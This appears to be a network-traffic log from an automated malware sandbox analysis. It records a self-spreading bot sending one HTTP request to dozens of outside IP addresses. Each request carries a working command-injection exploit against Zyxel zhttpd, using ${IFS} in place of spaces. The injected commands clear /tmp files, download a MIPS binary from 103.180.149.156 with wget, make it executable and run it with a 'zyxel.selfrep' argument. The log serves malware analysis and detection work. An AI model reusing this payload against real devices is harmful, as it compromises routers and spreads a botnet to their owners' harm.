                                                      Feb 2, 2024 06:36:11.029956102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8888192.168.2.1439384109.221.239.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.029998064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8889192.168.2.1460296141.35.220.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030035973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8890192.168.2.144570432.97.201.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030091047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8891192.168.2.1455534222.170.208.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030123949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8892192.168.2.1446382203.131.140.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030165911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8893192.168.2.1432800131.105.220.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030204058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8894192.168.2.1435218175.153.165.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030251980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8895192.168.2.1446758152.70.251.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030287027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8896192.168.2.1453284125.196.153.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030333042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8897192.168.2.1449792175.91.235.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030383110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8898192.168.2.143430670.203.163.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030426979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8899192.168.2.143837484.92.192.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030456066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8900192.168.2.144272040.193.210.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030515909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8901192.168.2.143313639.150.59.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030564070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8902192.168.2.1451252152.78.136.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030611992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8903192.168.2.14485808.230.45.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030637980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8904192.168.2.145793086.161.13.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030659914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8905192.168.2.143419840.236.127.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030688047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8906192.168.2.1452010219.144.215.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030733109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8907192.168.2.1449746145.10.158.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030780077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8908192.168.2.143818864.226.143.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030800104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8909192.168.2.146006061.230.89.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030848026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8910192.168.2.1454206185.235.73.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030884981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8911192.168.2.1441712134.184.224.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030913115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8912192.168.2.1459472173.239.164.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.030971050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8913192.168.2.145807072.244.189.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031018019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8914192.168.2.1432906218.125.203.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031033039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8915192.168.2.1432936204.8.113.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031090021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8916192.168.2.1455836216.244.84.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031126022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8917192.168.2.1455588101.162.50.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031178951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8918192.168.2.1460280141.222.147.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031217098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8919192.168.2.1455692205.35.12.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031265974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8920192.168.2.1447532116.225.203.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031312943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8921192.168.2.1454884140.43.161.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031354904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8922192.168.2.145357813.27.166.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031416893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8923192.168.2.1434144197.130.159.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031456947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8924192.168.2.1453002144.246.126.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031478882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8925192.168.2.1455694140.170.193.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031532049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8926192.168.2.14593685.123.100.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031572104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8927192.168.2.1444848172.254.83.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031620979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8928192.168.2.1455822156.109.67.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031661034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8929192.168.2.145530298.145.64.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031691074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8930192.168.2.145180874.115.170.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031744957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8931192.168.2.144118423.83.178.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031780005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8932192.168.2.144763817.26.190.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031822920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8933192.168.2.1450086115.21.34.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031847000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8934192.168.2.1455648194.245.222.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031894922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8935192.168.2.143319897.18.36.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031939983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8936192.168.2.1459462157.230.90.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.031975031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8937192.168.2.143643269.137.196.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032002926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8938192.168.2.1458334183.28.15.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032047987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8939192.168.2.145357451.24.220.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032097101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8940192.168.2.1435964120.198.69.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032145023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8941192.168.2.1452462155.48.22.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032188892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8942192.168.2.1435614213.180.180.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032233000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8943192.168.2.1448540154.90.248.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032274008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8944192.168.2.1448956192.83.218.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032331944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8945192.168.2.1449522186.154.102.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032370090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8946192.168.2.1460664120.237.34.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032390118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8947192.168.2.1439562119.111.60.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032438993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8948192.168.2.1450758109.151.203.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032461882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8949192.168.2.1445844106.113.146.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.032511950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8950192.168.2.1442696217.42.12.150443
                                                      TimestampBytes transferredDirectionData
